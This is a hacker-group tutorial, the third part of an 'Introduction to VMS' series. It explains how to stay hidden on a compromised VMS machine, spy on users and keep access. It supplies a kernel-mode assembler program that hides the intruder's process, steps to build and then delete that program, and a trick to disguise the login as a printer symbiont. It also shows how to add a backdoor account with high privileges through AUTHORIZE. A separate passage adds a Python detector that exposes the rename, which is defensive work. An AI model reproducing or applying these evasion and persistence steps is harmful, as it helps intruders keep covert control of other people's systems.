Introduction to VMS - Part III.
gr1p@b4b0.org

As I said, Part III would follow very soon, so we can continue the
introduction to VMS with this paper and move on to more interesting
material later.  The last paper in this introductory series covered
gaining entry to the box, looking at user privileges, how to gain more
accounts and so on.  This paper carries on where Part II left off.  I am
going to demonstrate how to attempt to make yourself invisible to other
users in the hope of keeping access for as long as possible.  I will also
outline possible ways to spy on users and monitor system activity, as well
as adding system accounts.

--> Making yourself invisible

Most of the content in this section really comes down to common sense and
staying aware of the other people on the machine.  For example, if you go
around deleting users' data you are going to arouse suspicion and therefore
increase the chance of getting caught.  The idea is to keep access for as
long as possible, so cut out suspicious activity and play it safe.

There are many steps you must take to ensure that you stay hidden on the
system; I'll try to outline as many as I can.

The first thing to do is hide from the SHOW USER command, the VMS equivalent
of who in UNIX, which lets anyone see all the users on the system.  Since
you need to appear as a ghost on the system, you need to do something so
that you do not show up when someone runs SHOW USER.  A lot of people make
their login process a non-interactive process, which means it no longer
appears under SHOW USER; however, the process is still visible to anyone
who runs SHOW SYSTEM.  The way around that, which I was originally shown
and still use due to its efficiency, is to disguise your login process as
one of the printer driver processes that show up under SHOW SYSTEM.

When you run SHOW SYSTEM at the DCL prompt you get information about the
current system: process information, information on drivers and so on.  You
will notice names similar to the following driver names:

SYMBIONT_11, NETBIOS, CRON, OPERATOR, etc.

Below is a short sample of the SHOW SYSTEM table (not a complete table).

0000010A AUDIT_SERVER    HIB     9      77   0 00:00:00.21     592    626
0000010B JOB_CONTROL     HIB     9     418   0 00:00:00.77     239    378
0000010C QUEUE_MANAGER   HIB     8    1936   0 00:00:07.75    1128   1514
0000010D SECURITY_SERVER HIB    10     102   0 00:00:00.65    1140   1344
00000126 AppleTalk ACP   HIB     9      49   0 00:00:00.08     195    356
00000127 ATKGW$ACP       HIB     9      53   0 00:00:00.04     131    220
00000128 MSAF$SERVER0    HIB     6    4750   0 00:00:07.42    1842    122
00000129 SYMBIONT_8      HIB     4       8   0 00:00:00.11     432     77
0000012A MSAP$RCVR0      HIB     6      31   0 00:00:00.24     982    666
0000012B SYMBIONT_9      HIB     4       8   0 00:00:00.14     453     92
0000012C MSAP$RCVR1      HIB     6      23   0 00:00:00.21    1021    561
0000012D MSAP$RCVR2      HIB     6      16   0 00:00:00.17     911    516
0000012E SYMBIONT_10     HIB     4       8   0 00:00:00.13     438     77
00000130 SYMBIONT_11     HIB     4       8   0 00:00:00.13     453     92
00000131 MSAP$RCVR4      HIB     6      23   0 00:00:00.19    1022    516
00000132 MSAP$RCVR5      HIB     6      37   0 00:00:00.13    1001    516
00000134 CRON            HIB     6     458   0 00:00:01.91     339    406
0000015A GIT393          HIB     5    1810   0 00:00:01.02    1269    710
00000162 AEB477          HIB     6    4486   0 00:00:02.13    1861    717
00000165 MKR121          HIB     5     873   0 00:00:00.82    1383    732

You will notice from the SHOW SYSTEM table above, and probably from ones
you find yourselves, that they usually contain quite a few SYMBIONT_**
entries.  These are printer drivers, and if the machine is on a .edu subnet
the SHOW SYSTEM table will probably contain quite a few printer driver
entries.  This is a perfect place to hide your login process and therefore
become invisible on the system.

What I usually do is change my login process to appear as SYMBIONT_666 in
the SHOW SYSTEM table, so that to anyone who runs SHOW SYSTEM my login
process looks like a printer driver.  Using the SHOW SYSTEM table above as
an example, our username is MKR121; remember that!  To change your login
process into the process of an extra printer driver, use the assembler
program below, which runs on a VMS system.  It is called stealth.mar; I
don't know who coded it originally.

				-- snip --

        .library /sys$library:lib.mlb/
        .link    /sys$system:sys.stb/
        $pcbdef

        .entry  no_user,^m<>
        $cmkrnl_s routin=blast_it
        ret

        .entry  blast_it,^m<>
        tstl    pcb$l_owner(r4)
        bneq    outta_here
        bbcc    #pcb$v_inter,pcb$l_sts(r4),outta_here
        clrb    pcb$t_terminal(r4)
        decw    g^sys$gw_ijobcnt
        bisl    #pcb$m_noacnt,pcb$l_sts(r4)
outta_here:
        movl    #ss$_normal,r0
        ret

        .end    no_user

				-- snip --

To get this program onto the system, first run the command:

$ create stealth.mar

Then type the code into the editor; once it is entered, press Ctrl-Z to
exit the CREATE editor and return to the DCL prompt.  Now that the
stealth.mar file is on the system you need to assemble, link and run it to
become a hidden login process.  The command lines below do just that: they
run the stealth program and clean up afterwards.

$ macro stealth

$ link /nomap stealth

$ delete stealth.obj;*

$ delete stealth.mar;*

$ run stealth

$ del stealth.exe;*

Once you have done the above, look at the SHOW SYSTEM table on your
terminal.  Look for the last SYMBIONT_** entry, e.g. SYMBIONT_11, and pick a
number a little above it for your own "hidden login process printer
driver".  I usually use SYMBIONT_666, but it is more sensible to use the
number after the last printer driver entry on the list; in the case
highlighted above that is SYMBIONT_11, so we hide our login process as
SYMBIONT_12 by running the command line below.

$ set proc/name="SYMBIONT_12"

This renames your login process to SYMBIONT_12, a printer driver to the
untrained eye, thereby hiding you within the system, as we can see when we
run the SHOW SYSTEM command once more:

0000010A AUDIT_SERVER    HIB    9      77   0 00:00:00.21     592   626
0000010B JOB_CONTROL     HIB    9     418   0 00:00:00.77     239   378
0000010C QUEUE_MANAGER   HIB    8    1936   0 00:00:07.75    1128  1514
0000010D SECURITY_SERVER HIB   10     102   0 00:00:00.65    1140  1344
00000126 AppleTalk ACP   HIB    9      49   0 00:00:00.08     195   356
00000127 ATKGW$ACP       HIB    9      53   0 00:00:00.04     131   220
00000128 MSAF$SERVER0    HIB    6    4750   0 00:00:07.42    1842   122
00000129 SYMBIONT_8      HIB    4       8   0 00:00:00.11     432    77
0000012A MSAP$RCVR0      HIB    6      31   0 00:00:00.24     982   666
0000012B SYMBIONT_9      HIB    4       8   0 00:00:00.14     453    92
0000012C MSAP$RCVR1      HIB    6      23   0 00:00:00.21    1021   561
0000012D MSAP$RCVR2      HIB    6      16   0 00:00:00.17     911   516
0000012E SYMBIONT_10     HIB    4       8   0 00:00:00.13     438    77
00000130 SYMBIONT_11     HIB    4       8   0 00:00:00.13     453    92
00000131 MSAP$RCVR4      HIB    6      23   0 00:00:00.19    1022   516
00000132 MSAP$RCVR5      HIB    6      37   0 00:00:00.13    1001   516
00000134 CRON            HIB    6     458   0 00:00:01.91     339   406
0000015A GIT393          HIB    5    1810   0 00:00:01.02    1269   710
00000162 AEB477          HIB    6    4486   0 00:00:02.13    1861   717
00000165 SYMBIONT_12     HIB    5     873   0 00:00:00.82    1383   732

Notice how SYMBIONT_12 has replaced the process that was once called MKR121,
i.e. your login process; you are now perfectly hidden from other users.
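The two listings above are exactly what an operator comparing SHOW SYSTEM snapshots would have in front of them, and the rename leaves two traces in them: PID 00000165 keeps its number but changes its name, and the new "symbiont" carries the base priority and I/O count of an interactive process rather than of its neighbours. The Python below is an added example, not code from the original text: it parses excerpts constructed from the page's two tables and reports both traces. The column meanings and the outlier heuristic are assumptions, not anything VMS documents.

```python
"""Diff two SHOW SYSTEM listings to spot a renamed login process.

Added example for this page, not code from the original text.  BEFORE and
AFTER are excerpts constructed from the two listings shown above; the column
meaning (PID, process name, state, priority, I/O count, CPU time, page
faults, pages) is assumed from the usual SHOW SYSTEM layout.
"""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid name state pri io cpu faults pages")

# One SHOW SYSTEM row: 8-hex-digit PID, a name that may contain spaces
# ("AppleTalk ACP"), a state word, then the numeric columns.
LINE_RE = re.compile(
    r"^(?P<pid>[0-9A-F]{8})\s+(?P<name>.+?)\s+(?P<state>[A-Z]+)\s+"
    r"(?P<pri>\d+)\s+(?P<io>\d+)\s+(?P<cpu>\d+ \d\d:\d\d:\d\d\.\d\d)\s+"
    r"(?P<faults>\d+)\s+(?P<pages>\d+)$"
)

# Constructed excerpt of the first listing on the page (before the rename).
BEFORE = """\
00000126 AppleTalk ACP   HIB     9      49   0 00:00:00.08     195    356
00000129 SYMBIONT_8      HIB     4       8   0 00:00:00.11     432     77
0000012B SYMBIONT_9      HIB     4       8   0 00:00:00.14     453     92
0000012E SYMBIONT_10     HIB     4       8   0 00:00:00.13     438     77
00000130 SYMBIONT_11     HIB     4       8   0 00:00:00.13     453     92
00000134 CRON            HIB     6     458   0 00:00:01.91     339    406
00000162 AEB477          HIB     6    4486   0 00:00:02.13    1861    717
00000165 MKR121          HIB     5     873   0 00:00:00.82    1383    732
"""

# Constructed excerpt of the second listing (after SET PROCESS/NAME).
AFTER = """\
00000126 AppleTalk ACP   HIB    9      49   0 00:00:00.08     195   356
00000129 SYMBIONT_8      HIB    4       8   0 00:00:00.11     432    77
0000012B SYMBIONT_9      HIB    4       8   0 00:00:00.14     453    92
0000012E SYMBIONT_10     HIB    4       8   0 00:00:00.13     438    77
00000130 SYMBIONT_11     HIB    4       8   0 00:00:00.13     453    92
00000134 CRON            HIB    6     458   0 00:00:01.91     339   406
00000162 AEB477          HIB    6    4486   0 00:00:02.13    1861   717
00000165 SYMBIONT_12     HIB    5     873   0 00:00:00.82    1383   732
"""


def parse_show_system(text):
    """Return {pid: Proc} for every row that matches the SHOW SYSTEM layout."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            g = m.groupdict()
            procs[g["pid"]] = Proc(g["pid"], g["name"], g["state"],
                                   int(g["pri"]), int(g["io"]), g["cpu"],
                                   int(g["faults"]), int(g["pages"]))
    return procs


def renamed_processes(before, after):
    """PIDs present in both snapshots whose process name changed.

    A SET PROCESS/NAME keeps the PID, so a name change on a surviving PID is
    the most direct trace of what the page describes."""
    return sorted((pid, before[pid].name, after[pid].name)
                  for pid in before.keys() & after.keys()
                  if before[pid].name != after[pid].name)


def odd_symbionts(procs):
    """SYMBIONT_* entries whose priority or I/O count is out of line with
    the other symbionts.  Heuristic assumption: genuine print symbionts on
    one system share a base priority and do very little I/O while idle."""
    syms = [p for p in procs.values() if p.name.startswith("SYMBIONT_")]
    if len(syms) < 2:
        return []
    pris = [p.pri for p in syms]
    mode_pri = max(set(pris), key=pris.count)
    median_io = sorted(p.io for p in syms)[len(syms) // 2]
    return sorted(p.name for p in syms
                  if p.pri != mode_pri or p.io > 10 * max(median_io, 1))


if __name__ == "__main__":
    before, after = parse_show_system(BEFORE), parse_show_system(AFTER)
    for pid, old, new in renamed_processes(before, after):
        print(f"PID {pid}: {old} -> {new}")
    for name in odd_symbionts(after):
        print(f"{name} does not look like the other symbionts")
```

Run against the page's own listings, the PID comparison reports 00000165 going from MKR121 to SYMBIONT_12, and the outlier check singles out SYMBIONT_12 on its own, since it runs at priority 5 with 873 I/Os while every real symbiont sits at priority 4 with 8. The second check is the one that works without a prior snapshot, which is why the page's advice to pick a number "after the last printer driver" does not make the process blend in.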

--> Monitoring Activity

There are many ways to monitor activity, from simply seeing who is logged
onto the box with the SHOW USER command to more in-depth monitoring such as
the ANALYZE commands.  If you have the CMKRNL privilege, which, if you
remember from Part II of this guide, gives access to kernel mode and is one
of the most important and powerful privileges on a VMS box, you can use the
ANALYZE/SYSTEM command, which gives an extremely detailed breakdown of what
each user is doing on the box.  ANALYZE is the best command for examining
the machine further: you can monitor users' system status, memory usage,
file usage, what they are accessing, and so on.  It is the ultimate
monitoring command in VMS and should always be used if you have obtained
the CMKRNL privilege.  Another ANALYZE command is ANALYZE/AUDIT, which loads
the Audit Analysis Utility; this extracts information directly from the
system security audit journal, which can be very useful.  Other ANALYZE
commands are as follows (bits taken from HELP):

ANALYZE/DISK_STRUCTURE which is basically similar to the UNIX df command and 
will display information about disk volumes on the machine.

ANALYZE/ERROR_LOG which will report the contents of the error_log file.

ANALYZE/IMAGE will describe the contents of an image file.

ANALYZE/OBJECT will describe the contents of an object module.

As you can see from what I have described so far in this section, the
ANALYZE command can give you a lot of information about your hacked system
and its users, _providing_ you have the CMKRNL privilege; it is important
to remember that.

Another important command for looking at system activity, not so much
monitoring current activity as looking at past activity, is SHOW.  The SHOW
command can really only be used to look at your own account, but if it is
an account that has been "stolen" then you will still find some
interesting information here.  Some uses of the SHOW command are as follows
(from HELP):

SHOW/QUOTA will display your current disk quota on the box's disk volume.

SHOW/DEFAULT will display the current default device and directory.

SHOW/ERROR will display the error count for all devices with error counts
above zero.

SHOW/WORKING_SET will display the working set limit, quota, and extent
assigned to the current process.

SHOW/ACCOUNTING will show which resources the current accounting file is
tracking.

As you can see from the above few commands, SHOW has some power to help you
gain information about your account, however, it is not as powerful as the
ANALYZE command.

--> Adding your own accounts

You may feel confident that you can get away with adding your own accounts
to a VMS box; this is easily done with the following few command lines.

You need to use the AUTHORIZE program, which is found in the sys$system
directory along with the password file and other user data, so to execute
AUTHORIZE you must first set your default directory there:

$ set default sys$system

Next, run the AUTHORIZE program:

$ run authorize

This will then present you with the following prompt, funnily enough called
a UAF prompt.

UAF>

UAF stands for User Authorization File, and this is where you make the
modifications to create your new account.  To add an account, run the
following command line at the UAF prompt:

UAF> add gr1p /password=t34mb4b0/priv=setprv

This adds the user gr1p with the password t34mb4b0 to the box.  UAF adds
the data to both the sysuaf.dat file and the rightslist.dat file.  The
above account was set up with the privilege SETPRV, which is a very high
privilege but not really what we would call a "superuser", so it does not
look as conspicuous as a superuser account.  I take it most of you will
know that when dealing with a UNIX system, if you add a UID/GID 0 account
to /etc/passwd it will look _very_ conspicuous.  The same holds for a VMS
box and highly privileged accounts.

That concludes my three-part Introduction to VMS; you should now have the
basic knowledge needed to explore the world of VMS hacking.  Good luck. :)

I'd just like to say werd to Substance for always keeping 9x tight.  
Remember, only you can do it bro. :>

Finally, as always, the links..

9x   -> http://www2.dope.org/9x
b4b0 -> http://www.b4b0.org 

Look out for more VMS related texts soon..

gr1p
gr1p@b4b0.org
http://www.b4b0.org/gr1p  
